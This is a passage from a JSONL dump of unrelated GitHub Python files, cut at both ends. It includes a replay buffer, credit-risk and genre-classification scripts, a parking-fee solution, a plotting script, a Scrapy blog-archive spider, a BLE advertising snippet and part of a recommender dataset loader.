self.y = cat_y[buffer_idxs]\n        self._buffer_weights = sorted_weights[:self.buffer_size]\n\n\nclass RegressionBuffer(SupervisedLearningBuffer):\n    def __init__(self, dim):\n        super().__init__(dim, 'regression')\n\n\nclass BalancedClassificationBuffer(Buffer):\n    def __init__(self, dim, num_classes):\n        super().__init__()\n        self.dim = dim\n        self.num_classes = num_classes\n        self.buffers = [ClassifcationBuffer(dim, num_classes) for _ in range(num_classes)]\n        self.past_tasks = []\n\n    def save_buffer(self, path):\n        for buffer_id, buffer in enumerate(self.buffers):\n            buffer.save_buffer(path_name=f'{path}_buffer_{buffer_id}')\n\n    def load(self, path):\n        for buffer_id, buffer in enumerate(self.buffers):\n            buffer.load(path_name=f'{path}_buffer_{buffer_id}')\n\n    def update_tasks(self, task_idx: List[int]):\n        self.past_tasks += task_idx\n\n    def get_cls_counts(self) -> dict:\n        return {f\"cls_{i}\": len(b) for i, b in enumerate(self.buffers)}\n\n    def add_data(self, data):\n        x, y = data\n        for i in range(self.num_classes):\n            idx = y == i\n            self.buffers[i].add_data((x[idx], y[idx]))\n\n    def get_data(self, batch_size: Union[int, Dict[int, int]]) -> Tuple[torch.Tensor, torch.Tensor]:\n        \"\"\"\n        Sample (without replacement) a batch of data from the buffer,\n        making sure that each class is represented equally.\n\n        If batch_size is an integer, then the batch size is the same for\n        all non-empty classes. 
If batch_size is a dictionary, then the\n batch size for each class is specified by the dictionary.\n \"\"\"\n assert isinstance(batch_size, (int, dict))\n if isinstance(batch_size, int):\n nonzero_num_classes = sum([len(b) > 0 for b in self.buffers])\n min_num_samples = min([len(b) for b_id, b in enumerate(\n self.buffers) if len(b) > 0 and b_id in self.past_tasks])\n X = torch.empty(0, *self.dim)\n y = torch.empty(0, dtype=torch.long)\n for b_id, b in enumerate(self.buffers):\n if isinstance(batch_size, int):\n cls_batch_size = min(\n batch_size // nonzero_num_classes, min_num_samples)\n elif isinstance(batch_size, dict) and b_id in batch_size:\n cls_batch_size = batch_size[b_id]\n else:\n continue\n if len(b) < cls_batch_size:\n continue\n cls_data = b.get_data(cls_batch_size)\n X = torch.cat((X, cls_data[0]))\n y = torch.cat((y, cls_data[1]))\n return X, y\n\n def __len__(self):\n return sum([len(b) for b in self.buffers])\n\n\ndef get_dataset_from_buffer(buffer: Buffer, data_size: int):\n buf_x, buf_y = buffer.get_data(\n batch_size=data_size\n )\n return torch.utils.data.TensorDataset(buf_x, buf_y)\n","repo_name":"vlongle/shell-refactor-data","sub_path":"shell-data/shell_data/dataset/buffer.py","file_name":"buffer.py","file_ext":"py","file_size_in_byte":6762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"14828394577","text":"#!/usr/bin/env python3 \n# -*- coding: utf-8 -*- \n\"\"\" \nCreated by Lanrete on 2018/6/15\n\"\"\"\n\nimport gc\nimport pandas as pd\n\nfrom sklearn.preprocessing import LabelEncoder\n\nfrom config import FIT_PARAMS\nfrom utility import timer\nfrom bureau_data_prepare import agg_bureau\nfrom pre_application_data_prepare import agg_pre_application\nfrom pipeline import fit_pipeline\n\nDATA_PATH = '../data'\n\n\ndef main(fit_params):\n data_path = '../data'\n train_base = pd.read_csv(f'{data_path}/application_train.csv')\n test_base = pd.read_csv(f'{data_path}/application_test.csv')\n\n train_base.set_index(keys='SK_ID_CURR', drop=True, inplace=True)\n test_base.set_index(keys='SK_ID_CURR', drop=True, inplace=True)\n\n with timer('Creating variables in base set'):\n for df in [train_base, test_base]:\n df['ANNUITY_INCOME_PERC'] = df['AMT_ANNUITY'] / df['AMT_INCOME_TOTAL']\n df['PAYMENT_RATE'] = df['AMT_ANNUITY'] / df['AMT_CREDIT']\n df['INCOME_CREDIT_PERC'] = df['AMT_INCOME_TOTAL'] / df['AMT_CREDIT']\n\n with timer('Aggregating bureau.csv'):\n bureau_df = agg_bureau()\n train_base = train_base.join(bureau_df, how='left')\n test_base = test_base.join(bureau_df, how='left')\n del bureau_df\n gc.collect()\n\n with timer('Aggregating previous_application.csv'):\n previous_application_df = agg_pre_application()\n train_base = train_base.join(previous_application_df, how='left')\n test_base = test_base.join(previous_application_df, how='left')\n del previous_application_df\n gc.collect()\n\n y = train_base['TARGET']\n del train_base['TARGET']\n y = LabelEncoder().fit_transform(y)\n\n header = 'Grid Searching Pipeline with parameter grids' if fit_params else 'Fitting and predicting'\n\n with timer(header):\n fit_pipeline(\n train_base, y,\n predict=True, x_score=test_base, fit_params=fit_params\n )\n\n\nif __name__ == '__main__':\n main(fit_params=FIT_PARAMS)\n","repo_name":"lanrete/HomeCreditDefaultRisk","sub_path":"source/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} 
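The ReservoirSamplingClassificationBuffer in the buffer.py record above keeps a bounded memory by drawing a random weight for every incoming example and retaining only the buffer_size largest weights, which leaves a uniform sample over everything seen so far. Below is a minimal standalone sketch of the same idea written as classic reservoir sampling (Algorithm R); the function name and parameters are illustrative and not taken from any record in this file.

import random

def reservoir_sample(stream, k, seed=0):
    # Keep a uniform random sample of k items from a stream of unknown length.
    # The i-th item (0-based) replaces a random slot with probability k / (i + 1),
    # so every item ends up in the sample with probability k / n.
    rng = random.Random(seed)
    sample = []
    for i, item in enumerate(stream):
        if i < k:
            sample.append(item)      # fill the reservoir first
        else:
            j = rng.randint(0, i)    # uniform index in [0, i]
            if j < k:
                sample[j] = item
    return sample

print(reservoir_sample(range(1000), k=5))

Sorting per-example random weights and keeping the top k, as the buffer record appears to do, draws from the same distribution; the incremental replacement above just avoids the per-batch sort.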
+{"seq_id":"3797939286","text":"from collections import defaultdict\n\ndef solution(fees, records):\n \n basic_t, base_price, unit_t, unit_price = fees\n \n def price(log, fees): # 2\n if len(log) % 2:\n log.append(23*60+59)\n t = sum(log[i+1] - log[i] for i in range(0, len(log), 2))\n return unit_price * -(-max(0, t-basic_t) // unit_t) + base_price\n \n log = defaultdict(list)\n \n for record in records: # 1\n t, n, _ = record.split()\n h, m = map(int, t.split(':'))\n log[n].append(60*h+ m)\n \n return [price(log[n], fees) for n in sorted(log)] # 3\n# import math\n\n# def solution(fees, records):\n# parking = {}\n# check = {}\n# answer = {}\n\n# for i in records:\n# time, number, order = i.split()\n# now = list(map(int,time.split(':')))\n# now_m = now[0] * 60 + now[1]\n# if order == \"IN\":\n# parking[number] = now_m\n# check[number] = True\n# if number not in answer:\n# answer[number] = 0\n# else:\n# check[number] = False\n# answer[number] += now_m - parking[number]\n\n# for i, flag in check.items():\n# if flag:\n# answer[i] += (23*60+59) - parking[i]\n# check[i] = True\n\n# for num, v in answer.items():\n# if v > fees[0]: # 요금 계산\n# answer[num] = fees[1] + (math.ceil((v - fees[0])/fees[2]))*fees[3]\n# else:\n# answer[num] = fees[1]\n\n# return list(dict(sorted(answer.items())).values())\n\n\n\nfees = [180, 5000, 10, 600]\nrecords = [\"05:34 5961 IN\", \"06:00 0000 IN\", \"06:34 0000 OUT\", \"07:59 5961 OUT\", \"07:59 0148 IN\", \"18:59 0000 IN\", \"19:09 0148 OUT\", \"22:59 5961 IN\", \"23:00 5961 OUT\"]\n# fees = [120, 0, 60, 591]\n# records = [\"16:00 3961 IN\",\"16:00 0202 IN\",\"18:00 3961 OUT\",\"18:00 0202 OUT\",\"23:58 3961 IN\"]\n# fees = [1, 461, 1, 10]\n# records = [\"00:00 1234 IN\"]\n\nprint(solution(fees, records))","repo_name":"BreathIN423/CodingTest","sub_path":"PGM/Python/lv2/주차 요금 계산.py","file_name":"주차 요금 계산.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"72035588597","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom databases.students import students\nfrom databases import ACOLE1, ACOLE2\nfrom methods import opt\nfrom base import default_axis_config\nfrom colors import color1, color2\nfrom Fig27_m1_tests import boxplot_blocks_pairs\n\ntop_labels = ['Leitura', 'Ditado por composição', 'Ditado manuscrito']\ninner_labels = ['Palavras regulares CV', 'Palavras com\\ndificuldades ortográficas']\n\n# def boxplot_blocks(ax, blocks, label):\n# bar_positions = np.arange(len(blocks))\n\n# data = [[p for p in block.data['deltas'] if p is not None] for block in blocks]\n# boxprops = dict(linewidth=1, color='black')\n# medianprops = dict(linewidth=2, color='orange')\n\n# bp1 = ax.boxplot(data[::2], positions=bar_positions[::2], widths=0.6, sym='o', boxprops=boxprops, medianprops=medianprops)\n# bp2 = ax.boxplot(data[1::2], positions=bar_positions[1::2], widths=0.6, sym='o', boxprops=boxprops, medianprops=medianprops)\n\n# ax.set_title(label)\n# default_axis_config(ax)\n\n# ax.set_xticks(bar_positions)\n# ax.set_xticklabels([block.legend for block in blocks], rotation=45, ha='right')\n\n# labels = [block.legend for block in blocks]\n# return bp1, bp2, labels\n\ndef plot_blocks(ax, blocks, label, y_padding=1.0):\n bar_width = 0.4\n bar_positions = np.arange(len(blocks))\n\n data = [[p for p in block.data['deltas'] if p is not None] for block in blocks]\n\n # calculate mean\n means = [np.mean(d) for d in data]\n\n # ax.set_ylim(0, 100)\n ax.set_title(label, 
y=y_padding)\n default_axis_config(ax, False)\n\n legends = [block.legend for block in blocks][0::2]\n ax.bar(bar_positions[::2], means[::2], width=bar_width, color=color1, label=inner_labels[0])\n ax.bar(bar_positions[1::2]-bar_width, means[1::2], width=bar_width, color=color2, label=inner_labels[1])\n\n ax.set_xticks(np.array(bar_positions[1::2]) - bar_width - bar_width / 2)\n ax.set_xticklabels(legends, ha='center')\n\nfilters = {\n 'Fig30_m1_completo': lambda students : [student for student in students if student.has_two_acoles() and student.has_m1],\n 'Fig30_m1_completo_acoles_completas': lambda students : [student for student in students if student.has_two_complete_acoles() and student.has_m1],\n 'Fig30_m1_completo_primeira_acole_incompleta': lambda students : [student for student in students if student.has_two_acoles_first_incomplete() and student.has_m1],\n\n 'Fig31_m2_completo': lambda students : [student for student in students if student.has_two_acoles() and student.has_m2],\n 'Fig31_m2_completo_acoles_completas': lambda students : [student for student in students if student.has_two_complete_acoles() and student.has_m2],\n 'Fig31_m2_completo_primeira_acole_incompleta': lambda students : [student for student in students if student.has_two_acoles_first_incomplete() and student.has_m2],\n\n 'Fig32_m3_completo': lambda students : [student for student in students if student.has_two_acoles() and student.has_m3],\n 'Fig32_m3_completo_acoles_completas': lambda students : [student for student in students if student.has_two_complete_acoles() and student.has_m3],\n 'Fig32_m3_completo_primeira_acole_incompleta': lambda students : [student for student in students if student.has_two_acoles_first_incomplete() and student.has_m3],\n\n 'Fig34_has_first_acole_incomplete': lambda students : [student for student in students if student.has_two_acoles_first_incomplete()],\n 'Fig33_has_two_acoles': lambda students : [student for student in students if student.has_two_acoles()],\n 'Fig35_has_two_complete_acoles': lambda students : [student for student in students if student.has_two_complete_acoles()],\n}\n\ndef bar_plot(students, use_boxplot, filename):\n if use_boxplot:\n figure_name = filename+'_boxplot'\n else:\n figure_name = filename\n opt.set_filename(figure_name)\n reading = []\n composition = []\n manuscript = []\n\n ACOLE_1 = ACOLE1.create()\n ACOLE_2 = ACOLE2.create()\n\n for student in filters[filename](students):\n ac1, ac2 = student.get_first_and_second_acoles()\n for block, student_block in zip(ACOLE_1.blocks, student.acoles[ac1].blocks):\n for key, data in student_block.data.items():\n if len(data) > 0:\n for d in data:\n block.data[key].append(d)\n\n for block, student_block in zip(ACOLE_2.blocks, student.acoles[ac2].blocks):\n for key, data in student_block.data.items():\n if len(data) > 0:\n for d in data:\n block.data[key].append(d)\n\n # df = ACOLE_2.days_per_week()\n # min_ = df['mean_days_per_week'].min() # 0.07317073170731707\n # max_ = df['mean_days_per_week'].max() # 2.4615384615384617\n values = [0.72, 1.30, 1.50, 1.70, 2.5]\n\n for r in ACOLE2.custom_range(values):\n blocks1 = ACOLE_1.by_frequency(r)\n blocks2 = ACOLE_2.by_frequency(r)\n reading.append(blocks2.LEITURA.delta(blocks1.LEITURA))\n reading.append(blocks2.LEITURA_DIFICULDADES.delta(blocks1.LEITURA_DIFICULDADES))\n composition.append(blocks2.DITADO_COMPOSICAO.delta(blocks1.DITADO_COMPOSICAO))\n composition.append(blocks2.DITADO_COMPOSICAO_DIFICULDADES.delta(blocks1.DITADO_COMPOSICAO_DIFICULDADES))\n 
manuscript.append(blocks2.DITADO_MANUSCRITO.delta(blocks1.DITADO_MANUSCRITO))\n manuscript.append(blocks2.DITADO_MANUSCRITO_DIFICULDADES.delta(blocks1.DITADO_MANUSCRITO_DIFICULDADES))\n\n fig, axs = plt.subplots(3, 1, sharey=True)\n fig.set_size_inches(5, 10)\n fig.set_dpi(100)\n # fig.suptitle(title, y=1.035, fontsize=14)\n\n groups = [reading, composition, manuscript]\n for group in groups:\n for block in group:\n block.legend = str([block.frequency_range.low, block.frequency_range.high])\n\n axs[1].set_ylabel('Diferença da porcentagem média de acertos')\n bpg1 = []\n bpg2 = []\n for (ax, title, data) in zip(axs, top_labels, groups):\n if use_boxplot:\n bp1, bp2, _ = boxplot_blocks_pairs(ax, data, title, title_y=1.0, limity=False, data='deltas')\n bpg1.append(bp1)\n bpg2.append(bp2)\n else:\n plot_blocks(ax, data, title)\n\n fig.tight_layout()\n\n fig.text(0.5, -0.02, 'Faixa de frequência semanal\\n(Dias/Semana)', ha='center', va='center', fontsize=12)\n\n x1 = 0.5\n y1 = 1.05\n if use_boxplot:\n fig.legend([bpg1[0][\"boxes\"][0], bpg2[0][\"boxes\"][0]], inner_labels, loc='upper center', bbox_to_anchor=(x1, y1), ncol=2)\n else:\n handles, labels = ax.get_legend_handles_labels()\n fig.legend(handles, labels, loc='upper center', bbox_to_anchor=(x1, y1), ncol=2)\n\n plt.savefig(opt.output_path(), bbox_inches='tight')\n plt.close()\n\ndef plot():\n \"\"\"\n Diferença entre a porcentagem de acertos na ACOLE final e inicial,\n \"\"\"\n for filename in filters.keys():\n bar_plot(students, use_boxplot=False, filename=filename)\n bar_plot(students, use_boxplot=True, filename=filename)\n\n # schools = sorted([k for k in students.schools(True).keys()])\n # for school in schools:\n # for filename in filters.keys():\n # students_by_school = students.by_school(school)\n # bar_plot(students_by_school, use_boxplot=False, filename=filename+'_'+school)\n # bar_plot(students_by_school, use_boxplot=True, filename=filename+'_'+school)\nif __name__ == \"__main__\":\n plot()","repo_name":"cpicanco/alfatech-analysis","sub_path":"figures/Fig30_frequency_deltas.py","file_name":"Fig30_frequency_deltas.py","file_ext":"py","file_size_in_byte":7486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"6971542035","text":"import lxml.html\n\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.contrib.loader.processor import Compose\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.selector import HtmlXPathSelector\n\nfrom rho_blogs.loaders import (BlogPostLoader, BlogAuthorLoader,\n CommentPostLoader, CommentAuthorLoader)\nfrom rho_blogs.processors import StringToDatetime\n\n\ndef strip_profile_url(value):\n \"\"\"strip /weblog/ from profile url\"\"\"\n if value.endswith('weblog/'):\n value = value[:-7]\n return value\n\ndef clean_post(value):\n \"\"\"Remove unwanted elements in post content\"\"\"\n doc = lxml.html.fragment_fromstring(value)\n doc.tag = 'div' # replaces
<li>\n    doc.attrib.clear()\n\n    # remove comment owner info\n    for e in doc.xpath('//div[@class=\"weblog_keywords\"]'):\n        e.drop_tree()\n\n    return lxml.html.tostring(doc)\n\ndef clean_comment(value):\n    \"\"\"Remove unwanted elements in comment content\"\"\"\n    doc = lxml.html.fragment_fromstring(value)\n    doc.tag = 'div' # replaces <li>
\n    doc.attrib.clear()\n\n    # remove empty links without children, e.g. name anchors\n    for e in doc.xpath('//a'):\n        if not e.getchildren() and not e.text:\n            e.drop_tag()\n\n    # remove comment owner info\n    for e in doc.xpath('//div[@class=\"comment-owner\"]'):\n        e.drop_tree()\n\n    return lxml.html.tostring(doc)\n\n\nclass ElggBlogAuthorLoader(BlogAuthorLoader):\n    profile_url_out = Compose(BlogAuthorLoader.default_output_processor,\n                              strip_profile_url)\n\n\nclass ElggBlogPostLoader(BlogPostLoader):\n    content_out = Compose(BlogPostLoader.default_output_processor,\n                          clean_post)\n    posted_out = Compose(BlogPostLoader.default_output_processor,\n                         StringToDatetime('%B %d, %Y'))\n\n\nclass ElggCommentAuthorLoader(CommentAuthorLoader):\n    profile_url_out = Compose(CommentAuthorLoader.default_output_processor,\n                              strip_profile_url)\n\n\nclass ElggCommentPostLoader(CommentPostLoader):\n    content_out = Compose(CommentPostLoader.default_output_processor,\n                          clean_comment)\n    posted_out = Compose(CommentPostLoader.default_output_processor,\n                         lambda s: s.split(' on ')[1],\n                         StringToDatetime('%A, %d %B %Y, %H:%M %Z |'))\n\n\n\nclass ElggBlogArchiveSpider(CrawlSpider):\n\n    username = None\n    domain = None\n\n    archive_url = 'http://%(domain)s/%(username)s/weblog/archive/'\n\n    content_selector_id = ''\n    content_selector_xpath = ''\n\n    post_loader = ElggBlogPostLoader\n    author_loader = ElggBlogAuthorLoader\n    comment_loader = ElggCommentPostLoader\n    comment_author_loader = ElggCommentAuthorLoader\n\n    def __init__(self):\n        assert self.username and self.domain\n        self.allowed_domains = [self.domain]\n        self.start_urls = [self.archive_url % {'username': self.username,\n                                               'domain': self.domain}]\n\n        archives_le = SgmlLinkExtractor(allow=self.get_archive_links_re(),\n                                        restrict_xpaths=self.get_archive_links_xpath())\n        posts_le = SgmlLinkExtractor(allow=self.get_post_links_re(),\n                                     restrict_xpaths=self.get_post_links_xpath())\n\n        self.rules = (\n            Rule(archives_le, follow=True),\n            Rule(posts_le, callback='parse_post'),\n        )\n\n        super(ElggBlogArchiveSpider, self).__init__()\n\n    def get_content_xpath(self):\n        if self.content_selector_xpath:\n            return self.content_selector_xpath\n        else:\n            return '//div[@id=\"%s\"]' % self.content_selector_id\n\n    def get_archive_links_re(self):\n        return r'/archive/\\d{4}/\\d{2}/'\n\n    def get_archive_links_xpath(self):\n        return '%s/ul/li' % self.get_content_xpath()\n\n    def get_post_links_re(self):\n        return r'/weblog/.+'\n\n    def get_post_links_xpath(self):\n        return '%s//div[@class=\"weblog-title\"]' % self.get_content_xpath()\n\n    def get_post_author_xpaths(self):\n        \"\"\"\n        Returns a tuple of xpath rules (container, name, profile_url, avatar_url)\n        \"\"\"\n        return ('%s//div[@class=\"user\"]' % self.get_content_xpath(),\n                './/a[2]/text()',\n                './/a[2]/@href',\n                './/img/@src')\n\n    def get_post_xpaths(self):\n        \"\"\"\n        Returns a tuple of xpath rules:\n        (container, title, content, tags, posted)\n\n        Does not return origin_url because it is taken from response.url\n        \"\"\"\n        return (self.get_content_xpath(),\n                './/div[@class=\"weblog-title\"]//text()',\n                './div[@class=\"weblog-post\"]/div[@class=\"post\"]',\n                # only extract tags with links\n                './/div[@class=\"weblog_keywords\"]//a/text()',\n                './/h2[@class=\"weblog_dateheader\"]/text()',\n                )\n\n    def get_comments_xpath(self):\n        return '%s//div[@id=\"comments\"]/ol/li' % self.get_content_xpath()\n\n    def get_comment_author_xpath(self):\n        \"\"\"\n        Returns a tuple of relative xpath rules to each comment xpath rule:\n        (container, name, profile_url, avatar_url)\n        \"\"\"\n        
return ('./div[@class=\"comment-owner\"]/p',\n './a[2]/text()',\n './a[2]/@href',\n './a[1]/img/@src',\n )\n\n def get_comment_post_xpath(self):\n \"\"\"\n Returns a tuple of relative xpath rules to each comment xpath rule:\n (container, content, posted, origin_url)\n \"\"\"\n return ('.',\n '.',\n './div[@class=\"comment-owner\"]/p/text()',\n './div[@class=\"comment-owner\"]/p/a[3]/@href',\n )\n\n def parse_post_author(self, response):\n hxs = HtmlXPathSelector(response)\n container, name, profile_url, avatar_url = self.get_post_author_xpaths()\n\n author = self.author_loader(selector=hxs.select(container))\n author.add_xpath('name', name)\n author.add_xpath('profile_url', profile_url)\n author.add_xpath('avatar_url', avatar_url)\n\n return author.load_item()\n\n def parse_post_comments(self, response):\n hxs = HtmlXPathSelector(response)\n\n (author_container,\n author_name,\n author_profile_url,\n author_avatar_url) = self.get_comment_author_xpath()\n\n (container, content,\n posted, origin_url) = self.get_comment_post_xpath()\n\n comment_list = []\n for comment in hxs.select(self.get_comments_xpath()):\n author = self.comment_author_loader(selector=comment.select(author_container))\n author.add_xpath('name', author_name)\n author.add_xpath('profile_url', author_profile_url)\n author.add_xpath('avatar_url', author_avatar_url)\n\n comment = self.comment_loader(selector=comment.select(container))\n comment.add_xpath('content', content)\n comment.add_xpath('posted', posted)\n comment.add_xpath('origin_url', origin_url)\n\n comment.add_value('author', [author.load_item()])\n\n comment_list.append(comment.load_item())\n\n return comment_list\n\n def parse_post(self, response):\n hxs = HtmlXPathSelector(response)\n container, title, content, tags, posted = self.get_post_xpaths()\n\n post = self.post_loader(selector=hxs.select(container))\n post.add_value('origin_url', [unicode(response.url)])\n post.add_xpath('title', title)\n post.add_xpath('content', content)\n post.add_xpath('tags', tags)\n post.add_xpath('posted', posted)\n\n author = self.parse_post_author(response)\n post.add_value('author', [author])\n\n comments = self.parse_post_comments(response)\n post.add_value('comments', comments)\n\n return post.load_item()\n","repo_name":"rmax/rho-blogs-crawler","sub_path":"rho_blogs/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":7935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"74544429236","text":"import ubluetooth\nfrom micropython import const\nimport ubinascii\n\nclass TEST_BLE:\n def __init__(self):\n self.ble = ubluetooth.BLE()\n if self.ble.active() == False:\n self.ble.active(True)\n self.show_bt_mac()\n\n def show_bt_mac(self):\n address_str = ubinascii.hexlify(self.ble.config(\"mac\")[1]).decode()\n print(\"BLE_MAC : \" + address_str)\n \n def adv(self):\n print(\"ble_advertise_start\")\n send_str = \"BLE,\"\n send_data = send_str.encode()\n self.ble.gap_advertise(20000 , adv_data=send_data)\n\nif __name__ == \"__main__\":\n # BLE通信\n print(\"adv start\")\n gps_ble = TEST_BLE() \n gps_ble.adv()","repo_name":"cdsl-research/C0119360_B4","sub_path":"late_term/rssi_test/ble_adv.py","file_name":"ble_adv.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"73550798196","text":"import sys\nfrom numpy import load, std, mean, vstack, array, reshape, save\nfrom sklearn import preprocessing\nfrom operator 
import itemgetter\nfrom constants import NUMBER_OF_FEATURES, NUMBER_OF_TRAINING_FEATURES, SIMILARITY_WEIGHT, SCORE_EXP, ALL_TRAINING_FEATURES_DATA_DIR, OPTIMAL_TRAINING_FEATURES_DIR, OPTIMAL_TRAINING_FEATURES_DATA_DIR\nfrom scale_data import scale_data_single\nfrom k_nearest_neighbor import find_optimal_k\n\ndef get_features_sorted_by_same_genre_similarity(all_training_features):\n genre_stds = []\n for feature_index in range(NUMBER_OF_FEATURES):\n genre_stds.append(({\n 'min': [],\n 'mean': [],\n 'max': []\n }))\n\n for genre, features in all_training_features.items():\n for feature_index, feature in enumerate(features):\n for prop, prop_values in feature.items():\n genre_stds[feature_index][prop].append(std(prop_values))\n\n average_genre_stds = {\n 'min': [0] * NUMBER_OF_FEATURES,\n 'mean': [0] * NUMBER_OF_FEATURES,\n 'max': [0] * NUMBER_OF_FEATURES\n }\n\n for feature_index, feature in enumerate(genre_stds):\n for prop, prop_stds in feature.items():\n average_genre_stds[prop][feature_index] = mean(prop_stds)\n\n scaled_average_genre_stds = {}\n for prop, stds in average_genre_stds.items():\n stds = array(stds).reshape(-1, 1)\n scaler = preprocessing.MinMaxScaler(feature_range = (0, 1)).fit(stds)\n scaled_average_genre_stds[prop] = scaler.transform(stds)\n\n feature_props = []\n for prop, scaled_average_genre_feature_stds in scaled_average_genre_stds.items():\n for feature_index, scaled_average_genre_feature_std in enumerate(scaled_average_genre_feature_stds):\n feature_id = feature_index + 1\n feature_name = str(feature_id) + '_' + prop\n feature_props.append({\n 'feature_id': feature_id,\n 'feature_prop': prop,\n 'feature_name': feature_name,\n 'std': scaled_average_genre_feature_std[0]\n })\n\n features_sorted_by_same_genre_similarity = sorted(feature_props, key=itemgetter('std'))\n return features_sorted_by_same_genre_similarity\n\n\ndef get_features_sorted_by_genre_difference(all_training_features):\n combined_genre_feature_prop_averages = []\n for feature_index in range(NUMBER_OF_FEATURES):\n combined_genre_feature_prop_averages.append({\n 'min': [],\n 'mean': [],\n 'max': []\n })\n\n for genre, features in all_training_features.items():\n for feature_index, feature in enumerate(features):\n for prop, prop_values in feature.items():\n combined_genre_feature_prop_averages[feature_index][prop].append(mean(prop_values))\n\n feature_props = []\n for feature_index, feature in enumerate(combined_genre_feature_prop_averages):\n for prop, prop_averages in feature.items():\n feature_id = feature_index + 1\n feature_name = str(feature_id) + '_' + prop\n feature_props.append({\n 'feature_id': feature_id,\n 'feature_prop': prop,\n 'feature_name': feature_name,\n 'std': std(prop_averages)\n })\n\n features_sorted_by_genre_difference = sorted(feature_props, key=itemgetter('std'), reverse=True)\n return features_sorted_by_genre_difference\n\ndef get_sorted_features(features_sorted_by_same_genre_similarity, features_sorted_by_genre_difference):\n scored_features = []\n for index, feature in enumerate(features_sorted_by_same_genre_similarity):\n same_genre_similarity_score = (index ** SCORE_EXP) * SIMILARITY_WEIGHT\n genre_difference_score = (list(map(itemgetter('feature_name'), features_sorted_by_genre_difference)).index(feature['feature_name']) ** SCORE_EXP) * (1 - SIMILARITY_WEIGHT)\n scored_features.append({\n 'feature_id': feature['feature_id'],\n 'feature_prop': feature['feature_prop'],\n 'score': same_genre_similarity_score + genre_difference_score\n })\n\n sorted_features = 
sorted(scored_features, key=itemgetter('score'))\n return sorted_features\n\n\ndef find_optimal_training_features(all_training_features):\n features_sorted_by_same_genre_similarity = get_features_sorted_by_same_genre_similarity(all_training_features)\n features_sorted_by_genre_difference = get_features_sorted_by_genre_difference(all_training_features)\n sorted_features = get_sorted_features(features_sorted_by_same_genre_similarity, features_sorted_by_genre_difference)\n return sorted_features[0:NUMBER_OF_TRAINING_FEATURES]\n\ndef save_optimal_training_features(all_training_features, optimal_training_features):\n optimal_training_features_data = {\n 'X_train': [],\n 'y_train': [],\n 'k': 0\n }\n\n for genre, features in all_training_features.items():\n genre_X_train = []\n genre_y_train = []\n for song_index in range(len(features[0]['min'])):\n genre_X_train.append([])\n genre_y_train.append(genre)\n\n for feature_index, feature in enumerate(features):\n feature_id = feature_index + 1\n for prop, prop_values in feature.items():\n if any(f['feature_id'] == feature_id and f['feature_prop'] == prop for f in optimal_training_features):\n for song_index, prop_value in enumerate(prop_values):\n genre_X_train[song_index].append(prop_value)\n\n optimal_training_features_data['X_train'].extend(genre_X_train)\n optimal_training_features_data['y_train'].extend(genre_y_train)\n\n X_train_scale = scale_data_single(optimal_training_features_data['X_train'])\n optimal_training_features_data['k'] = find_optimal_k(X_train_scale, optimal_training_features_data['y_train'])\n\n save(OPTIMAL_TRAINING_FEATURES_DIR, optimal_training_features)\n save(OPTIMAL_TRAINING_FEATURES_DATA_DIR, optimal_training_features_data)\n\n\ndef main(argv):\n all_training_features = load(ALL_TRAINING_FEATURES_DATA_DIR).item()\n optimal_training_features = find_optimal_training_features(all_training_features)\n save_optimal_training_features(all_training_features, optimal_training_features)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"arvidede/music-genre-classification","sub_path":"generate_optimal_training_features.py","file_name":"generate_optimal_training_features.py","file_ext":"py","file_size_in_byte":6333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"18135327178","text":"# coding: utf-8\n\n\"\"\"\nData pre-processing\n##########################\n\"\"\"\nfrom logging import getLogger\nfrom collections import Counter\nimport os, copy\nimport pandas as pd\nimport numpy as np\nimport time\n#from torch.utils.data import Dataset\n\n\nclass RecDataset(object):\n def __init__(self, config, df=None):\n self.config = config\n self.dataset_path = os.path.abspath(config['data_path'])\n self.preprocessed_dataset_path = os.path.abspath(config['preprocessed_data'])\n self.preprocessed_loaded = False # if preprocessed data loaded?\n self.logger = getLogger()\n self.dataset_name = config['dataset']\n\n # dataframe\n self.uid_field = self.config['USER_ID_FIELD']\n self.iid_field = self.config['ITEM_ID_FIELD']\n self.ts_id = self.config['TIME_FIELD']\n\n if df is not None:\n self.df = df\n return\n self.ui_core_splitting_str = self._k_core_and_splitting()\n self.processed_data_name = '{}_{}_processed.inter'.format(self.dataset_name, self.ui_core_splitting_str)\n # load from preprocessed path?\n if self.config['load_preprocessed'] and self._load_preprocessed_dataset():\n self.preprocessed_loaded = True\n self.logger.info('\\nData loaded from preprocessed dir: ' + 
self.preprocessed_dataset_path + '\\n')\n return\n # load dataframe\n self._from_scratch()\n # pre-processing\n self._data_processing()\n\n def _k_core_and_splitting(self):\n user_min_n = 1\n item_min_n = 1\n if self.config['min_user_inter_num'] is not None:\n user_min_n = max(self.config['min_user_inter_num'], 1)\n if self.config['min_item_inter_num'] is not None:\n item_min_n = max(self.config['min_item_inter_num'], 1)\n # splitting\n ratios = self.config['split_ratio']\n tot_ratio = sum(ratios)\n # remove 0.0 in ratios\n ratios = [i for i in ratios if i > .0]\n ratios = [str(int(_ * 10 / tot_ratio)) for _ in ratios]\n s = ''.join(ratios)\n return 'u{}i{}_s'.format(user_min_n, item_min_n) + s\n\n def _load_preprocessed_dataset(self):\n file_path = os.path.join(self.preprocessed_dataset_path, self.processed_data_name)\n if not os.path.isfile(file_path):\n return False\n # load\n self.df = self._load_df_from_file(file_path, self.config['load_cols']+[self.config['preprocessed_data_splitting']])\n return True\n\n def _from_scratch(self):\n \"\"\"Load dataset from 